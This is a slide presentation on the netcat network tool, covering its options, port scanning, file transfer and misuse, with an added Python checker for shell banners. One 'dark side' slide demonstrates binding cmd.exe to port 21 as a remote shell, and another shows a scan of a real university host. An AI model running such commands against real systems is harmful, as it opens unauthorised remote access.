netcat
Purpose of Presentation…?
Analyze the network
Identify the network security issues
How to do it …?
First Step Research the Network
Tools for Research
Information Gathering tools
Forensic tools
Network Utility tools
Password Auditing tools
Recovery And Restoration tools
Vulnerability Scanning & Analysis tools
What is netcat?
Swiss Army Knife of Network
A versatile network utility tool
Uses TCP and UDP protocol
Designed as a backend tool
Can be used directly
Driven by other programs
Power of netcat
Can create outbound or inbound connections
TCP or UDP to or from any ports
Full DNS forward/reverse checking
Can use any local port
Can use any locally configured network address
Port scanning with randomizer
Option to let other program service establish connections
Optional telnet responder
How Do I use netcat?
General form of usage is
nc [switches] [hostname] [portnumber]
Simplest usage would be
nc -v www.msn.com 80
Use GET method
GET / HTTP/1.0
Hostname can be a name or IP address
Use of -n switch
If not specified, performs forward and reverse DNS lookup
Reports the problem of mismatched names in DNS
D:\tools\nc>nc -v www.hotmail.com 80
DNS fwd/rev mismatch: www.hotmail.com != hotmail.se
DNS fwd/rev mismatch: www.hotmail.com != ld.cb.msn.com
DNS fwd/rev mismatch: www.hotmail.com != ld.cb.msn.com
www.hotmail.com [207.68.171.233] 80 (http) open
If specified, will take only an IP address as hostname argument
Options
-v  Controls the verbosity level
-w <seconds>  Sets the network inactivity timeout
-p <port number>  Binds the connection to specific port number
Options
-o <file name>  To obtain hexdump file of data sent either way
-l  Makes netcat wait for inbound connections
And once connection is established it transfers the data
Interesting -l
Can be used to create a listening netcat server
On listening end
D:\tools\nc>nc -l -p 1234 < test.txt
On client end
D:\tools\nc>nc 192.168.0.100 1234
Options
-L  Listen harder
-r  Randomize port numbers
-z  Zero-I/O mode [used in scanning]
Options
-e <program name>  Allows to execute a program (dangerous)
-d  Allows to run in detached mode without console window
-u  Makes a UDP connection instead of TCP connection
Options
-s <address>  Local source address
-i <seconds>  Specifies delay interval for lines sent or ports scanned
-t  Answer telnet negotiation
Put the Knife to Use
Use It GOOD
Use It BAD
USE IT GOOD
Port Scanning
Find what is out there
• nc -v -w 5 -r davinci.newcs.uwindsor.ca 20-30
D:\tools\nc>nc -v -w 5 -r davinci.newcs.uwindsor.ca 20-30
davinci.newcs.uwindsor.ca [137.207.76.3] 22 (?) open
SSH-2.0-Sun_SSH_1.0
davinci.newcs.uwindsor.ca [137.207.76.3] 28 (?) open
davinci.newcs.uwindsor.ca [137.207.76.3] 20 (ftp-data) open
davinci.newcs.uwindsor.ca [137.207.76.3] 23 (telnet) open
internet2 proxy-telnet [v3.1] ready
√☺Please enter your userid: davinci.newcs.uwindsor.ca [137.207.76.3] 24 (?) open
davinci.newcs.uwindsor.ca [137.207.76.3] 30 (?) open
davinci.newcs.uwindsor.ca [137.207.76.3] 25 (smtp) open
220-Sendmail 8.6.12/8.6.12 ready on internet2
220 ESMTP spoken here
davinci.newcs.uwindsor.ca [137.207.76.3] 26 (?) open
davinci.newcs.uwindsor.ca [137.207.76.3] 29 (?) open
davinci.newcs.uwindsor.ca [137.207.76.3] 27 (?) open
davinci.newcs.uwindsor.ca [137.207.76.3] 21 (ftp) open
220- internet2 proxy-ftp [v3.1] ready
220 Please enter your userid
D:\tools\nc>
USE IT GOOD
Simple Data Transfer Agent
Immaterial which side is server and which side is client
Input at one goes as output to another
HEX Dump Feature
Can be used to analyze odd network protocols
USE IT GOOD
Performance Testing
Generate a large amount of useless data on the network; with a server on one end and a client on the other, we can use it to test network performance.
Protect your workstation's X server
DARK SIDE
Scanning for vulnerable services
Can use files as input to netcat and scan the system by using -i and -r switches
Can use -e option to execute programs
SYN-Bombing
Can disable TCP servers
EXAMPLE
Listen on port 21 (FTP port) using netcat with the -e switch to execute cmd.exe
An FTP request is made from a different machine to the listener machine
RESULT
LISTENER
D:\tools\nc>nc -l -p 21 -e cmd.exe
Request
C:\Documents and Settings\RAJAT>ftp 192.168.0.100
Connected to 192.168.0.100.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
D:\tools\nc>
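A defender-side check for the result above, as an added example that is not part of the original presentation: it parses `nc -v` scan output, groups each banner under its open port, and flags ports that answer with a command-shell banner or with a greeting that does not match the expected protocol. The host name, address, sample scan text, expected-banner table and shell markers are constructed assumptions.

```python
import re

# Assumed greeting prefix for services that speak first on connect.
EXPECTED = {21: "220", 22: "SSH-", 25: "220"}
# Strings cmd.exe prints on start; seeing them on a port suggests a
# listener bound with -e, as in the port 21 result above.
SHELL_MARKERS = ("Microsoft Windows", "(C) Copyright")

# Matches netcat's verbose "open" line: host [ip] port (service) open
OPEN_RE = re.compile(r"^\S+ \[[\d.]+\] (?P<port>\d+) \([^)]*\) open\s*$")

# Constructed sample in the format netcat prints (not a real scan).
SAMPLE = """\
host.example [192.0.2.10] 22 (?) open
SSH-2.0-Sun_SSH_1.0
host.example [192.0.2.10] 21 (ftp) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
host.example [192.0.2.10] 25 (smtp) open
SSH-2.0-OpenSSH_8.9
"""

def parse_scan(text):
    """Return {port: [banner lines]} from verbose netcat scan output."""
    results, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = OPEN_RE.match(line)
        if m:
            current = int(m["port"])
            results[current] = []
        elif current is not None and line:
            results[current].append(line)
    return results

def audit(results):
    """Return (port, reason) pairs for banners that need investigation."""
    findings = []
    for port, banner in sorted(results.items()):
        joined = "\n".join(banner)
        if any(marker in joined for marker in SHELL_MARKERS):
            findings.append((port, "shell banner"))
        elif port in EXPECTED and banner and not banner[0].startswith(EXPECTED[port]):
            findings.append((port, "unexpected banner"))
    return findings

if __name__ == "__main__":
    for port, reason in audit(parse_scan(SAMPLE)):
        print(f"port {port}: {reason}")
```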
Environment
Local Home Network
ISP --- Cogeco
Three PCs
OS Windows XP
Connected via DLink Router
Cat 5 connecting cables used
Conclusion
Netcat is a very useful network utility tool
Very light but extremely effective
Particularly when it can listen and execute programs when connection requests are made on the specific ports
THANK YOU